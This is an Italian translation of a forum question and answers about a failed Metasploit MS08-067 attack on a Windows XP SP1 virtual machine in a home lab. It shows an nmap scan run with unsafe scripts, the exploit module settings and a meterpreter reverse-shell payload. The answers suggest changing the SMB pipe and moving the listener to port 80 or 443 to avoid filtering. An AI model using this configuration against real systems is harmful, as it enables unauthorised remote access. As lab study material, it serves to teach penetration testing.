MS08_067 con Metasploit [chiuso]

4

Sto imparando come usare Metasploit. Sto usando VirtualBox per eseguire una VM con Kali Linux (192.168.56.101) e un'altra con Windows XP SP1 (192.168.56.103). Le due macchine virtuali possono eseguire il ping tra loro e Windows Firewall è disabilitato. Sto eseguendo Metasploit su Kali Linux e sto tentando di attaccare Windows XP SP1.

Accendo msfconsole e inizio con una scansione delle porte:

nmap -sT -A --script=smb-check-vulns -Pn --script-args=unsafe=1 192.168.56.103

che mi dice

Host script results:
| smb-check-vulns: 
|   MS08-067: VULNERABLE

Ho impostato i parametri in questo modo:

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.56.103   yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (accepted: seh, thread, process, none)
   LHOST     192.168.56.101   yes       The listen address
   LPORT     8080             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   2   Windows XP SP0/SP1 Universal

Quindi:

msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.56.101:8080 
[*] Attempting to trigger the vulnerability...
msf exploit(ms08_067_netapi) > sessions -l

Active sessions
===============

No active sessions.

Che cosa sto sbagliando?

Modifica: ho fatto lo stesso con una macchina virtuale Windows XP SP3 e ha funzionato! Non capisco davvero perché non funzionerà con Windows XP SP1 ...

    
posta Kiuhnm 29.12.2014 - 21:39
fonte

2 risposte

1

Sembra che il tuo exploit non abbia successo. Puoi provare diversi payload o cambiare LPORT. A volte le porte possono essere bloccate dal firewall e non si otterrà la shell inversa. E una volta che il tuo exploit ha avuto successo, riceverai immediatamente la reverse shell, senza bisogno di digitare il comando "sessions -l".

    
risposta data 29.12.2014 - 23:30
fonte
1

Solo un paio di cose:

È possibile che nmap abbia interrotto il servizio originale. Il parametro unsafe = 1 per lo script NSE sta dando il permesso di crash se necessario. Assicurati che la scatola venga riavviata tra nmap e exploiting per le migliori possibilità di successo. Potresti anche voler: * sfruttare SRVSVC piuttosto che il BROWSER. * imposta LPORT su 80 (o 443) poiché queste porte hanno meno probabilità di essere filtrate.

    
risposta data 30.12.2014 - 05:37
fonte

Leggi altre domande sui tag